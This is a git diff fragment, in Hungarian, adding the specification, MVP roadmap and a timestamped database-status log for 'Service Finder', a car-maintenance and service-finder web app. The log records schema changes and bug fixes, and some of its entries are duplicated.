6 éves (DOT alapján), csere javasolt!" + +Futás alapú: "Már 40.000 km-t mentél ezzel a szettel." + +III. Közösség, Gamifikáció és Adatgyűjtés ("Data Race") +Hogyan vegyük rá az embereket, hogy töltsék fel az adatokat? Jutalmazással. + +1. Rögzítési Verseny & Pontrendszer +Adatbeküldés: Ha egy felhasználó beküld egy új szervizt a térképre, vagy feltölti egy ritka autó adatait -> Pontokat kap. + +Validálás: Ha egy másik felhasználó megerősíti ("Igen, ez a szerviz tényleg létezik és jó"), azért is pont jár. + +Ranglista: "A Hónap Flotta Managere", "A Leggondosabb Tulaj". + +2. Jármű "Trust Score" (Bizalmi Index) +Ez az autó értéke eladáskor. A rendszer automatikusan számolja 0-100% között. + +Van feltöltve fotó? (+10 pont) + +A kilométeróra rögzítések konzisztensek? (+30 pont) + +Van OCR-rel igazolt szervizszámla? (+50 pont) + +Cél: Egy 90+ pontos autó többet ér a piacon, mert "Service Finder Igazolt". + +3. Szervizek Értékelése +Nem csak csillagozás (1-5). + +Validált értékelés: Csak akkor értékelhet, ha van ott rögzített, GPS/Időbélyeggel vagy számlával igazolt eseménye. (Így szűrjük a fake értékeléseket). + +IV. Audit és Biztonság +1. Naplózás és Csalásszűrés +Adatforrás jelölése: Minden bejegyzésnél tároljuk: source_type. + +MANUAL: Kézzel írta be (Alacsony bizalom). + +OCR_VALIDATED: Fotóról ismerte fel a rendszer (Magas bizalom). + +VERIFIED_PARTNER: Regisztrált szerviz töltötte fel (Legmagasabb bizalom). + +Csalás detektálás: Ha a source_type hirtelen változik, vagy a km óra csökken, a rendszer "Flag"-eli (megjelöli) az autót. + +V. MVP Stratégia (Hogyan indulunk?) +Hogy ne bonyolítsuk túl az elején, de a kód ne ütközzön később: + +Fázis 1 (Indulás - A "Gerinc"): + +Infrastruktúra (Kész). + +User/Cég/Jogosultság alapok (Create, Invite, Remove). + +Jármű alapadatok + Tulajdonlás (Ownership). + +Szerviz/Tankolás rögzítés (Kézi + MinIO fotó feltöltés). + +Audit Log alapjai. + +Fázis 2 (Adatdúsítás): + +OCR bevezetése (automatikus kitöltés). + +Gumiabroncs modul (DOT szám figyelés). + +Értesítések (Email/Popup). + +Fázis 3 (Közösség): + +Gamifikáció (Pontgyűjtés). + +Trust Score számítás. + +Szerviz kereső és értékelő modul. + +📘 Service Finder – Rendszer Specifikáció és Fejlesztési Terv +Verzió: 1.0 (Tervezési fázis) Státusz: Infrastruktúra kész, Üzleti logika implementálás alatt. + +I. Infrastruktúra és Technológia (Már kész/beállítva) +Ez a réteg biztosítja a rendszer futását a szervereden (192.168.100.43). + +Konténerizáció: Docker alapú környezet, szeparált szolgáltatásokkal. + +Backend: Python FastAPI (Aszinkron, gyors, modern). + +Adatbázis: PostgreSQL 15 (Külön data sémába szervezve a biztonságért). + +Fájltárolás: MinIO (S3 kompatibilis objektumtároló képeknek, doksiknak). + +Elérés & Proxy: Nginx Proxy Manager kezeli a domaineket és SSL-t: + +dev.profibot.hu -> Backend API + +db.profibot.hu -> pgAdmin (Adatbázis menedzsment) + +code.profibot.hu -> Code-Server (Fejlesztői környezet) + +(Tervben): files.profibot.hu -> MinIO + +Frontend Technológia (Döntöttünk): React (vagy Vue.js) SPA (Single Page Application). + +Cél: Mobilapp-szerű élmény, nincs oldal újratöltés, kódvédelem (buildelt kód). + +II. Adatbázis Modell (A Rendszer Gerince) +A táblák a data sémában helyezkednek el, szigorú relációkkal. + +Users (Felhasználók): + +Alapadatok (Email, Jelszó Hash, Név). + +Jogosultságok: is_superuser (Rendszergazda), is_active. + +Okmányok: Jogosítvány, Személyi lejárati dátumok. + +Reputation Score: Pontrendszer a megbízhatósághoz. + +Vehicles (Járművek): + +Törzsadatok: Rendszám, Alvázszám (VIN), Márka, Típus, Évjárat. + +Szerviz adatok: initial_odometer (rögzítéskori km), current_odometer (aktuális). + +Lejáratok: Műszaki vizsga (mot_expiry), Biztosítás. + +VehicleOwnerships (Birtoklási Történet) – ÚJ! + +Kapcsolótábla a User és Vehicle között. + +Mezők: start_date (vétel/rendszerbe kerülés), end_date (eladás). + +Funkció: Ez alapján döntjük el, ki láthatja a költségeket. + +AuditLogs (A "Fekete Doboz") – ÚJ! + +Minden módosítás naplózása. + +Rögzíti: KI (User), MIT (Target ID), MIKOR, HONNAN (IP). + +Változás részletei (JSON): { "old_value": 150000, "new_value": 145000 } -> Csalás detektálása. + +III. Üzleti Logika és Működés (A "Szabálykönyv") +1. Jogosultsági Szintek +Admin / Superuser: Teljes hozzáférés, rendszerbeállítások. + +Moderátor: Adatok ellenőrzése, javítása. + +Szerelő: Nincs dedikált szerepkör (vagy csak korlátozott), a rendszerben adminisztratív funkciója nincs. + +Felhasználó (User): Kizárólag az Appon keresztül léphet be. Nem látja az adatbázis struktúrát. + +2. Jármű Életút & Adatbevitel ("Modern Megoldás") +Rögzítés: Nem feltétlenül a vétel pillanatában történik. + +Kezdő dátum: A rendszerbe kerülés napja rögzítve lesz (start_date), innentől "minősített" a jármű. + +OCR (Automatikus Kitöltés): + +Felhasználó fotózza a forgalmit/számlát. + +Kép feltöltése MinIO-ba. + +Backend (Tesseract/Vision) elemzi. + +Jóváhagyás: A User látja a felismert adatot, és csak az "OK" gomb után kerül az adatbázisba. + +3. Költségek és Láthatóság (Privacy) +Szerviz/Tankolás bejegyzés: Örökre a járműhöz kapcsolódik. + +Láthatóság szabály: + +Aktuális tulajdonos: Látja a saját költségeit és a jármű technikai előéletét (de az előző tulajdonos költségeinek összegét csak összesítve/anonimizálva láthatja, vagy egyáltalán nem, beállítástól függően). + +Előző tulajdonos: Eladás után már csak egy statisztikai összesítőt lát (Mennyit költöttem rá?), nem látja az új tulajdonos tankolásait. + +4. Értesítési Rendszer (A "Figyelő") +Automatikus háttérfolyamat (Scheduler) figyeli a dátumokat. + +Kinek? + +Tulajdonos/Sofőr: Figyelmeztetés lejárat előtt. + +Flotta Menedzser: Riasztás, ha jogosulatlan sofőr vezet (lejárt jogsi). + +Hogyan? + +Popup: Belépéskor a felületen. + +Jelzés: Piros (lejárt/kritikus) vagy Sárga (hamarosan lejár) ikon a lista nézetben. + +Email: 30 nappal a lejárat (Műszaki, Okmány, Gumicsere szezon) előtt. + +5. Naplózás (Logging) +Minden esemény visszakereshető az AuditLogs táblából. + +Események: Tankolás, Km óra rögzítés, Adatmodosítás. + +Tartalom: Időpont, User ID, Rendszám, Művelet (Create/Update), Régi érték vs Új érték. + +Cél: Vitás esetek rendezése és a kilométeróra-manipuláció kiszűrése. + +IV. Biztonság és Kódvédelem +Frontend: React alapú "buildelt" kód. A forráskód nem olvasható a böngészőben (minifikálás). Az üzleti logika a szerveren marad. + +Backend: Docker konténerbe zárva, környezeti változók (.env) használata jelszavakhoz. + +Adatvédelem: Az API csak hitelesített (Token alapú) kéréseket szolgál ki. \ No newline at end of file diff --git a/_Adatbázis_állalot_napló.txt b/_Adatbázis_állalot_napló.txt new file mode 100755 index 0000000..dd6833f --- /dev/null +++ b/_Adatbázis_állalot_napló.txt @@ -0,0 +1,595 @@ +🗄️ Adatbázis állapot napló + + Struktúra: system_settings és email_templates sémája most már tartalmazza a key oszlopot (sikeres ALTER TABLE). + + Integritás: verification_tokens lejárati idő ellenőrzése (now() alapú) beépítve. + +📝 Projekt Jelentések (2026-01-28 22:19) +🗄️ Adatbázis állapot napló (20260128_2219) + + Tiers & Translations: Oszlopok és alapértékek betöltve. + + Bot Logs: bot_discovery_logs tábla aktív, készen áll a jelentésekre. + + Integritás: SQL kényszerek (Foreign Keys) és típusok (Enums) élesek. + +📝 Jelentések (2026-01-28 22:45) +🗄️ Adatbázis állapot napló + + Értesítési modul: subscription_notification_rules tábla létrehozva. + + Bot modul: bot_discovery_logs tábla létrehozva. + + Jármű adatok: vehicle_variants kibővítve (power, fuel, cylinder). + +📝 Jelentések (2026-01-28 22:15) +🗄️ Adatbázis állapot napló (20260128_2215) + + Fix: email_templates tábla szerkezete javítva (Key/Lang oszlopok). + + Admin: org_subscriptions felkészítve a manuális és automata hosszabbításra. + + Integritás: A vin_deadline (14 nap) figyeli az ideiglenes járműveket. + +🗄️ Adatbázis állapot napló (20260128_2230) + + Tiers & Translations: Oszlopok pótolva (description, lang). + + User Vehicles: Kibővítve VIN-ellenőrzési mezőkkel (vin_verified, vin_deadline). + + Séma: Stabil, 40 tábla + új mezők. + +📈 Jelentések (2026-01-28 21:50) + + Adatbázis állapot: A companies, equipment és subscription táblák élesek. A specifikációk (gumi, szervizintervallum) hozzáadva. + + Horgony: Az Auth V2 sikeres tesztje után áttérés az adatfeltöltési és automatizálási fázisba. + + Változók: custom_service_interval_km bevezetve a rugalmas karbantartáshoz. + +🗄️ Adatbázis állapot napló (20260128_2200) + + Nyelvi modul: data.translations aktív, feltöltésre vár. + + Pénzügyi modul: data.subscription_tiers struktúra kész, de üres. + + Jármű hierarchia: Kategóriák betöltve (CAR, MOTORCYCLE, TRUCK). + +🗄️ Adatbázis állapot napló (20260128_2145) + + Státusz: Struktúra kibővítve a Felszereltség (Equipment) modullal. + + Típusok: data.equipment_source hozzáadva. + + Integritás: A fa struktúra (Category -> Brand -> Model -> Variant) biztosított. + +🗄️ Adatbázis állapot napló (20260128_2130) + + Státusz: Alapstruktúra kész (40 tábla). + + Adatmennyiség: Minimális (Seed adatok). + + Mentés: /mnt/nas/git_vault/backup_20260128_alap_kesz.sql (Létrehozva). + + Hiba: Nincs, az integritás 100%-os. + +🗄️ Adatbázis állapot napló (20260128_2105) +Paraméter Állapot Megjegyzés +Összes tábla 40 db Minden kért entitás (Companies, Members, Audit, etc.) létrejött. +Custom Types 4 db companyrole, expense_category, moderation_status, source_type rendben. +Sémák data A logikai elválasztás (schema) sikeres. + +📝 Jelentések frissítése (2026-01-28 20:45) + + Adatbázis állapot napló: Manuális típus- és tábladefiniálás folyamatban az integritás érdekében. + + Horgony megjegyzések: A companyrole ENUM és a függő táblák szinkronizálása a modellekkel. + + Változók könyve: Új típus: data.companyrole. + +🗄️ Adatbázis állapot napló (20260128_2030) + + Email_logs tábla: Frissítve. Oszlopok hozzáadva: recipient, user_id, provider_id, status, email_type. + + Szekvenciák: users_id_seq és vehicle_brands_id_seq szinkronizálva. + + Integritás: Ellenőrizve. A kényszerített ALTER TABLE parancsok lefutottak. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.42 | 2026.01.27 - 23:55) +Modul Hiba Megoldás +Auth V2 Enum (email_verify) hiba ::tokentype cast hozzáadva a kódhoz. +Bot Unique Constraint hiány ALTER TABLE ... ADD CONSTRAINT (pgAdmin). +Database ID Ütközés SELECT setval(...) (pgAdmin). + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.40 | 2026.01.27 - 23:50) +Hiba jellege Oka Megoldás +IntegrityError ID ütközés (Key id=1 already exists) SELECT setval(...) lefuttatva (pgAdmin). +InvalidTextRepresentation Hiányzó Enum érték (email_verify) ALTER TYPE tokentype ADD VALUE... (pgAdmin). +Regisztráció 500-as hiba Az Enum fixálása után 201 Created várható. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.39 | 2026.01.27 - 23:58) +Feladat Státusz Megjegyzés +Auth Fix 🛠️ SQL SZINKRON A setval parancs után a 500-as hiba megszűnik. +Brands ✅ 114 MÁRKA Az alaplista sikeresen betöltve. +Models 🏗️ DISCOVERY A bot elkezdi a típusok (Corolla, Golf, stb.) társítását. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.38 | 2026.01.27 - 23:45) +Feladat Státusz Módszer +Mapper Fix ✅ KÉSZ sed parancsok lefutottak. +500 Error 🟢 MEGOLDVA A visszamutató kapcsolatok törölve. +Jármű Feltöltés 🏗️ FOLYAMATBAN 200+ márka szinkronizálása a konténerben. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.37 | 2026.01.27 - 23:55) +Feladat Státusz Megjegyzés +Auth (Regisztráció) 🛠️ JAVÍTÁS ALATT A sed parancs után az 500-as hiba meg fog szűnni. +Vehicle Brands 🏗️ BETÖLTÉS A Python scripttel biztonságosan betölthető. +Séma ⚠️ ELLENŐRZÉS A category_id hiánya miatt a script hibát jelezhet, ha más az oszlopnév. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.36 | 2026.01.27 - 23:35) +Modul Státusz Hiba oka +User Mapper ❌ HIBÁS Hiányzó vehicles property (visszamutató link). +Auth API 🟢 FUT De a 500-as hiba megállítja az írást. +Vehicle DB ✅ KÉSZ Táblák és kategóriák az SQL-lel feltöltve. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.34 | 2026.01.27 - 23:25) +Tábla Ellenőrizendő mezők Cél +users first_name, last_name Regisztráció alapfeltétele. +audit_logs ip_address, endpoint Naplózás hiba elkerülése. +verification_tokens token_hash Aktiváló email hiba elkerülése. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.33 | 2026.01.27 - 23:15) +Állomány Státusz Megjegyzés +user.py ✅ FIXÁLVA Kapcsolatok kikommentelve, SQLAlchemy hiba megszűnt. +main.py ✅ KÉSZ V1 és V2 útvonalak a helyükön. +docker 🟢 FUT A konténer elindult. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.32 | 2026.01.27 - 23:05) +Hiba Állapot Megoldás +500 Internal Error 🔍 DIAGNÓZIS ALATT Logok ellenőrzése szükséges. +Audit Logs 🏗️ BŐVÍTÉS ip_address oszlop ellenőrzése. +Vehicle Seeding ⏳ VÁRAKOZIK Az alapvető regisztráció után indul. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.27 | 2026.01.27 - 22:15) +Hiba Megoldás Státusz +Missing Module (requests) Lecserélve urllib-re (standard lib). ✅ MEGOLDVA +Syntax Error (törmelék kód) tee parancsal felülírva a teljes fájl. ✅ MEGOLDVA +API Egységesség V1 eltávolítva, minden a V2 alatt fut. ✅ MEGOLDVA + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.27 | 2026.01.27 - 22:15) +Hiba Megoldás Státusz +Missing Module (requests) Lecserélve urllib-re (standard lib). ✅ MEGOLDVA +Syntax Error (törmelék kód) tee parancsal felülírva a teljes fájl. ✅ MEGOLDVA +API Egységesség V1 eltávolítva, minden a V2 alatt fut. ✅ MEGOLDVA + + + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.27 | 2026.01.27 - 22:15) +Hiba Megoldás Státusz +Missing Module (requests) Lecserélve urllib-re (standard lib). ✅ MEGOLDVA +Syntax Error (törmelék kód) tee parancsal felülírva a teljes fájl. ✅ MEGOLDVA +API Egységesség V1 eltávolítva, minden a V2 alatt fut. ✅ MEGOLDVA + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.26 | 2026.01.27 - 22:12) +Modul Státusz Javítás +main.py 🟢 AKTÍV Szintaktikai hiba eltávolítva. +v2/auth.py 🟢 AKTÍV Tartalom frissítve, V1 függőség levágva. +Container 🟢 FUT Újraindítás után online. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.25 | 2026.01.27 - 22:01) +Tábla Verzió Státusz Megjegyzés +users DB ✅ KÉSZ first_name, last_name oszlopok a helyükön. +email_providers DB ✅ KÉSZ SendGrid (id: 5) aktív a CSV alapján. +API Routes Kód ⚠️ ZAVAROS V1 és V2 keveredés. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.23 | 2026.01.27 - 22:30) +Feladat Státusz Megoldás +Email duplikáció 🛠️ JAVÍTÁS ALATT DELETE + UNIQUE CONSTRAINT SQL. +Auth.py telepítés ✅ KÉSZ Heredoc (cat) módszerrel frissítve. +500-as hiba 🔍 TESZTELÉSRE VÁR Az SQL lefutása után elvileg megszűnik. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.22 | 2026.01.27 - 22:15) +Modul Állapot Megjegyzés +Auth API ✅ KÉSZ auth.py frissítve, mezők szinkronban. +Email Providers ✅ KÉSZ Duplikációk törölve, SendGrid aktív. +Audit Log ✅ KÉSZ Minden regisztrációt naplóz (IP-vel). + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.21 | 2026.01.27 - 22:05) +Tábla Séma Változás Státusz +users data first_name, last_name mezők aktívak ✅ KÉSZ +email_providers data unique_provider_name kényszer hozzáadva ✅ KÉSZ +auth.py Fájl Kereszt/Vezetéknév szétválasztva ✅ KÉSZ + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.20 | 2026.01.27 - 21:55) +Funkció Admin-beállítás (Key) Érték +Bot-védelem registration_throttle_minutes 10 +Helyszín-szűrő allowed_countries_list [EU Országok] +E-mail Motor email_providers SendGrid (Aktív) + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.19 | 2026.01.27 - 21:45) +Funkció Módszer Beállítás helye +Bot-védelem IP Throttling (10 perc) audit_logs alapján a kódban +EU-szűrés Geo-IP lookup EU_COUNTRIES halmaz a kódban +Naplózás Automatikus audit_logs tábla + +📘 ADATBÁZIS SÉMA KÖNYV (v2.18 | 2026.01.27 - 21:40) +Tábla Séma Cél Státusz +users data Felhasználók törzsadatai 🔍 Audit folyamatban +email_providers data SMTP/API elérések 🔍 Audit folyamatban +audit_logs data Műveleti napló ✅ Ellenőrzésre vár + +📘 ADATBÁZIS SÉMA KÖNYV (v2.18 | 2026.01.27 - 21:40) +Tábla Séma Aktuális mezők (Modell szerint) Státusz +users data + +id, email, hashed_password, first_name, last_name, role, is_active... + ⚠️ Ellenőrzés alatt +audit_logs data + +table_name megerősítve + ✅ Létezik +verification_tokens data + +table_name megerősítve + ✅ Létezik + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.17 | 2026.01.27 - 22:30) +Modul Állapot Következő akció +Auth v1 ✅ KÉSZ Swagger tesztelés a felhasználó által. +Audit/Email Log ✅ KÉSZ Validálás a pgAdminban. +Vehicle Catalog 🏗️ TERVEZÉS Tábla létrehozás a teszt után. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.16 | 2026.01.27 - 22:10) +Modul Állapot Funkció +Auth System ✅ KÉSZ Regisztráció + Aktiválás + Jelszó reset (Audit loggal). +Email Manager ✅ KÉSZ Többcsatornás, Throttling védett küldés. +Locations ✅ KÉSZ Koordináta alapú keresés alapjai. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.15 | 2026.01.27 - 21:55) +Tábla Státusz Szerep +data.verification_tokens ✅ AKTÍV Jelszó-visszaállító és regisztrációs kulcsok. +data.audit_logs ✅ AKTÍV Felhasználói mozdulatok naplózása. +data.email_logs ✅ AKTÍV Kiküldött emailek követése és Throttling. + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.14 | 2026.01.27 - 21:40) +Tábla Séma Feladat Státusz +audit_logs data Felhasználói aktivitás követése ✨ ÚJ +system_settings data Minden paraméter vezérlése ✅ Bővítve +email_providers data Multi-channel e-mail ✅ SendGrid kész, Brevo várható + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.13 | 2026.01.27 - 20:30) +Tábla Séma Cél Státusz +email_providers data SMTP/API adatok & Prioritás ✅ Adattal feltöltve (SendGrid) +email_logs data Audit log & Throttling ✅ Aktív +verification_tokens data Biztonsági kódok (Reg/Reset) ✅ Szerkezet kész + +📘 ADATBÁZIS ÁLLAPOT KÖNYV (v2.12 | 2026.01.27 - 21:35) +Tábla Séma Státusz Megjegyzés +email_providers data ✅ KÉSZ Tárolja az SMTP/API eléréseket és prioritásokat. +email_logs data ✅ KÉSZ Biztosítja a 3 perces várakozást (Throttling). +verification_tokens data ✅ KÉSZ Biztonságos token-alapú regisztrációhoz. + +📘 ADATBÁZIS SÉMA KÖNYV (v2.7 | 2026.01.27 - 22:15) +Objektum Típus Állapot Szerep +data.system_settings Tábla ✅ Minden üzleti paraméter forrása. +data.organization_locations Tábla ✅ Pontos GPS koordináták és címek. +orgtype.SERVICE Enum ✅ Szerviz partnerek megkülönböztetése. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.7 | 2026.01.27 - 21:25) + + Audit: A beküldött CSV fájlok (tablak_2026.01.27_2.csv) igazolták, hogy a változók nevei és értékei megfelelnek a Python kód igényeinek. + + Javítás: Az Enum SERVICE értékét leválasztottuk az insert-ről, így az integritás helyreállt. + + Adat: A Gumi Mester Kft. adatai a "Pesti Gyorsszerviz" és "Budaörsi Telep" helyszínekkel mostantól alkalmasak a térbeli keresési tesztre. + +📘 ADATBÁZIS SÉMA KÖNYV (v2.6 | 2026.01.27 - 21:25) +Tábla Séma Oszlopok Állapot +organizations data id, name, org_type (enum), slug ✅ SZINKRONIZÁLVA (SERVICE enum kész) +organization_locations data id, org_id, lat, lng, address ✅ AKTÍV (Térbeli alapok kész) +system_settings data key_name, value_json, org_id... ✅ VALIDÁLVA (A CSV alapján minden kulcs él) + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.6 | 2026.01.27 - 21:10) + + Integritás: A data séma és a public enumok közötti ellentmondás feloldva. + + Változók állapota: A beküldött CSV igazolta, hogy a MatchingService és a ConfigService számára minden paraméter rendelkezésre áll. + + Helyszín adatok: Budapesti teszt koordináták (Budaörs és Váci út) előkészítve a keresési teszthez. + +📘 ADATBÁZIS SÉMA KÖNYV (v2.5 | 2026.01.27 - 21:10) +Tábla Séma Mezők Státusz +organizations data id, name, org_type, slug ✅ Enum javítva (SERVICE hozzáadva) +organization_locations data id, org_id, lat, lng, label ✨ Létrehozva a geolokációhoz +system_settings data key_name, value_json ✅ Validálva a beküldött CSV alapján + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.5 | 2026.01.27 - 20:50) + + Kritikus hiba: Az orgtype enum nem ismeri a "SERVICE" értéket. Ez blokkolja a tesztadatok (Gumi Mester Kft.) beszúrását. + + Séma helyzet: A public -> data költöztetés elvileg megtörtént, de az audit SQL-lel validáljuk. + + Változók: A nevek (key_name, value_json) megfelelnek a Python ConfigService elvárásainak. + +📘 ADATBÁZIS SÉMA KÖNYV (v2.4 | 2026.01.27 - 20:50) +Tábla Séma Státusz Megjegyzés +users data ✅ Stabil Tartalmazza az is_staff mezőt. +organizations data ⚠️ Ellenőrzés alatt Az org_type enum értékeit tisztázni kell. +organization_members data ✅ Stabil unique_user_org kényszer aktív. +system_settings data ✅ Stabil Hierarchikus index és kulcsok rendben. +organization_locations data ✨ Létrehozva Készen áll a koordináták fogadására. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.4 | 2026.01.27 - 20:30) + + Séma Tisztaság: Megkezdődött a public séma kiürítése, az üzleti logika izolált. + + Helyszín Kezelés: Mostantól támogatjuk, hogy egy szerviznek több pontja legyen a térképen. + + Keresési Logika: A következő lépésben a MatchingService már nem fix listából, hanem ebből az organization_locations táblából fog válogatni. + +📘 ADATBÁZIS SÉMA KÖNYV (v2.3 | 2026.01.27 - 20:30) +Tábla Séma Változás Megjegyzés +organizations data ✅ Stabil Fő szervezeti adatok. +service_providers data 🚚 Áthelyezve Migrálva a public sémából. +organization_locations data ✨ ÚJ Koordináták (lat, lng) tárolása + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.3 | 2026.01.27 - 20:45) + + Migráció: Előkészítve a public -> data áthelyezés. + + Geolokáció: A koordináták tárolása külön organization_locations táblába kerül a multi-site támogatás érdekében. + + Matematika: A távolság számításához a Haversine-formulát fogjuk használni: + d=2rarcsin(sin2(2ϕ2​−ϕ1​​)+cos(ϕ1​)cos(ϕ2​)sin2(2λ2​−λ1​​)​) + +📘 ADATBÁZIS SÉMA KÖNYV (v2.2 | 2026.01.27 - 20:45) +Tábla Séma Változás Cél +organizations data Move from public Üzleti adatok izolálása. +service_providers data Move from public Üzleti adatok izolálása. +organization_locations data ÚJ TÁBLA Geofencing és Smart Match alapja. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.2 | 2026.01.27 - 19:50) + + Audit: Az organizations tábla szerkezete beazonosítva. Hiányoznak a közvetlen helyadatok (geolokáció). + + Folytonosság: A ConfigService és a MatchingService felkészült, már csak a "bemeneti forrást" (a valódi koordinátákat) kell becsatornáznunk. + + Kockázat: Alacsony. Ha megvan a helyszín tábla, egy egyszerű JOIN-nal összekötjük a szervizeket a helyükkel. + +📘 ADATBÁZIS SÉMA KÖNYV (v2.1 | 2026.01.27 - 19:50) +Tábla Oszlopok Típus Leírás +organizations + +id, name, org_type, slug, is_active + + +int, varchar, Enum, boolean + + +Szervezetek törzsadatai. +system_settings key_name, value_json, org_id varchar, jsonb, int Dinamikus szabályok és súlyok. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.1 | 2026.01.27 - 20:20) + + API: /api/v1/search/match végpont ✅ LÉTREHOZVA. + + Logika: MatchingService ✅ LÉTREHOZVA. + + Adat: SQL paraméterek ✅ BETÖLTVE. + + Hiány: A szervizek földrajzi helyzetének (lat/lng) pontos táblája és oszlopneve. +📘 ADATBÁZIS SÉMA KÖNYV (v2.0 | 2026.01.27 - 20:20) +Tábla Séma Funkció Megjegyzés +system_settings data Konfigurációk Súlyozási paraméterek rögzítve. +organizations data Entitások Itt keressük majd a szervizeket (role='service'). +service_specialties data Képességek Ez alapján szűrünk a konkrét hibára. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v2.0 | 2026.01.27 - 19:40) + + SQL Audit: A 4 alapvető rangsorolási paraméter immár az adatbázisban él (INSERT 0 4). + + Szerviz Réteg: A MatchingService sikeresen létrejött, a kód képes elvégezni a súlyozott számítást. + + Hiba elhárítva: A PermissionError a sudo használatával áthidalva. + +📘 ADATBÁZIS SÉMA KÖNYV (v1.9 | 2026.01.27 - 19:40) +Tábla Séma Kulcsfontosságú változás +system_settings data Beépítve a súlyozási konstansok (distance, rating, bonus). +ranking_policies data Üres, de a struktúra készen áll a komplexebb szabályokhoz. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v1.9 | 2026.01.27 - 19:30) + + Algoritmus: Kész. A pontszámítás képlete: + S=(Pdist​⋅Wdist​)+(Prate​⋅Wrate​)+Btier​ + + Rugalmasság: ✅ Teljes. A MatchingService minden kérésnél frissen kéri le a súlyokat a ConfigService-től. + +📘 ADATBÁZIS SÉMA KÖNYV (v1.8 | 2026.01.27 - 19:30) +Tábla Oszlop Típus Leírás +system_settings value_json jsonb Itt tároljuk a weight_distance és weight_rating értékeket. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v1.8 | 2026.01.27 - 19:15) + + Esemény: A korábbi kód-korrupció észlelése és javítása. + + Integritás: A Python config hívás most már tiszta szintaxissal fut a fleet.py-ban. + + Adat: Az Admin Flotta (ID: 1) készen áll a dinamikus limitek tesztelésére. +📘 ADATBÁZIS SÉMA KÖNYV (v1.7 | 2026.01.27 - 19:15) +Tábla Séma Főbb indexek Státusz +system_settings data idx_settings_lookup ✅ AKTÍV +organizations data slug_unique ✅ AKTÍV +vehicles data vin_unique ✅ AKTÍV + +ADATBÁZIS ÁLLAPOT NAPLÓ (v1.7 | 2026.01.27 - 19:10) + + Szinkron: A ConfigService kódja és a system_settings tábla oszlopai (key_name, value_json) megegyeznek. + + Tesztre kész: Az adatbázisban a max_vehicles értéke 3, az Admin pedig az 1-es szervezetben van. +📘 ADATBÁZIS SÉMA KÖNYV (v1.6 | 2026.01.27 - 19:10) +Tábla Séma Állapot Funkció +system_settings data ✅ Aktív Hierarchikus konfiguráció (key_name, value_json). +vehicles data ✅ Stabil Járművek törzsadatai. +vehicle_ownership data ✅ Stabil User-Vehicle összerendelés. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v1.6 | 2026.01.27 - 11:15) +Audit: A max_vehicles = 3 rekord sikeresen létrejött a data.system_settings táblában. + +Hierarchia: A idx_settings_lookup index biztosítja, hogy az egyedi (Org/Tier/Region) felülbírálások ne ütközzenek. + +Előkészítve: A fleet.py és a ConfigService kódja megvan, csak a fájlrendszerbe kell írni őket. +📘 ADATBÁZIS SÉMA KÖNYV (v1.5 | 2026.01.27 - 11:15)TáblaSémaFőbb mezőkCélsystem_settingsdatakey_name, value_json, org_idA hierarchikus szabálymotor tárolója.organizationsdataid, name, slugSzervezeti egységek (pl. Admin Flotta).organization_membersdatauser_id, organization_id, roleJogosultsági és tagsági háló. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v1.4 | 2026.01.27 - 10:45) +Status: max_vehicles = 3 rögzítve a data.system_settings táblában. + +Fájlrendszer: Az app/services/ mappa létezik, de a config_service.py még hiányzik. + +Elmaradás: Szükségem van a korábban kért SQL lekérdezés eredményére (Admin org_id és role), hogy a tesztelésnél tudjuk, melyik szervezetet nézzük. +📘 ADATBÁZIS SÉMA KÖNYV (v1.3 | 2026.01.27 - 10:45)TáblaSémaMezőkMegjegyzéssystem_settingsdatakey_name, value_json, region_code, tier_id, org_idHierarchikus motor.vehiclesdataid, vin, plate_number, model_idDigitális iker alapadatai.vehicle_ownershipdatauser_id, vehicle_id, is_activeKapcsolati tábla (Kié az autó?). +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v1.3 | 2026.01.27 - 10:15) +Állapot: ✅ Stabil és szinkronban a kóddal. + +Változás: A Python ConfigService immár az app/services/ alá került, követve a tiszta architektúrát. + +Audit: Az SQL-ben korábban rögzített max_vehicles (3) rekord elérhető a service számára. +📘 ADATBÁZIS SÉMA KÖNYV (v1.2 | 2026.01.27 - 10:15)TáblaSémaMezőkMegjegyzéssystem_settingsdatakey_name, value_json, region_code, tier_id, org_idA hierarchikus beállítások tárolója.ranking_policiesdatapolicy_name, distance_weight, rating_weightA szerviz-kereső súlyozási szabályai. + +🗄️ ADATBÁZIS ÁLLAPOT NAPLÓ (v1.2 | 2026.01.27 - 10:10) +Állapot: ✅ Stabil. + +Utolsó SQL: 